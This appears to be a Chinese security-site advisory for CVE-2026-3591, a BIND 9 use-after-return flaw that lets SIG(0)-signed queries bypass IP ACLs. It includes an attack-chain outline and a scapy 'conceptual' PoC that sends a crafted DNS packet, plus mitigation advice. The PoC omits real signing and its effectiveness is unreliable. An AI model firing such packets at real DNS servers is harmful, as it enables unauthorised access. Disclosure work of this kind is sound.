CVE-2026-3591 CVSS 5.4 中危

CVE-2026-3591 BIND 9 named服务器use-after-return漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3591

漏洞类型

释放后重用

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

BIND 9

漏洞概述

BIND 9的named服务器在处理SIG(0)签名的DNS查询时存在use-after-return漏洞。攻击者可利用特制请求导致ACL匹配错误，在默认允许配置下绕过IP限制获取未授权访问。

技术细节

该漏洞发生在BIND 9处理SIG(0)签名的DNS查询过程中，由于use-after-return缺陷，攻击者发送特制DNS请求可干扰ACL机制对IP地址的验证。尽管默认拒绝ACL会失效保护，但在默认允许（黑名单）模式下，此漏洞会导致IP地址误判，从而允许被拦截的IP地址通过ACL验证，实现未授权访问。影响版本包括9.20.0至9.20.20及9.21.0至9.21.19等。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出运行受影响BIND 9版本的目标DNS服务器。

STEP 2

2. 构造攻击包

攻击者构造包含SIG(0)签名记录的特制DNS查询请求，旨在触发use-after-return条件。

STEP 3

3. 触发漏洞

向目标服务器发送恶意请求，导致named服务处理ACL时发生内存逻辑错误，错误匹配IP地址。

STEP 4

4. 绕过限制

在默认允许的ACL配置下，本应被拒绝的IP地址成功通过验证，获取未授权的DNS服务访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-3591 (Conceptual)
# Requires: scapy
# Description: Sends a SIG(0) signed DNS query to trigger the ACL mismatch.

from scapy.all import *
import random

def send_exploit(target_ip):
    # Construct a DNS query with SIG(0) record
    # Note: Actual cryptographic signing is omitted for brevity; focus on structure.
    
    domain = "example.com"
    
    # Craft packet with specific SIG(0) characteristics to trigger use-after-return
    pkt = IP(dst=target_ip)/UDP(dport=53)/DNS(
        rd=1,
        qd=DNSQR(qname=domain),
        # Adding additional/authority section with SIG(0) to trigger the path
        ar=DNSRR(
            rrname=domain, 
            type=255, 
            rclass=3, 
            ttl=0,
            # Malformed data to attempt triggering the vulnerability
            rdata=b'\x00' * 64  
        )
    )
    
    print(f"[*] Sending crafted packet to {target_ip}...")
    send(pkt)
    print("[*] Packet sent. Check if ACL was bypassed.")

if __name__ == "__main__":
    target = "192.168.1.100" # Replace with actual target
    send_exploit(target)

影响范围

BIND 9 9.20.0 - 9.20.20

BIND 9 9.21.0 - 9.21.19

BIND 9 9.20.9-S1 - 9.20.20-S1

防御指南

临时缓解措施

建议尽快升级到修复版本。若无法升级，请确保ACL配置为默认拒绝模式，并严格限制使用SIG(0)功能的客户端IP，同时密切监控日志以发现潜在的利用尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-3591
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-3591
3 Details https://www.cvedetails.com/cve/CVE-2026-3591/
4 VulDB https://vuldb.com/cve/CVE-2026-3591
5 Link https://downloads.isc.org/isc/bind9/9.20.21
6 Link https://downloads.isc.org/isc/bind9/9.21.20
7 Link https://kb.isc.org/docs/cve-2026-3591

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表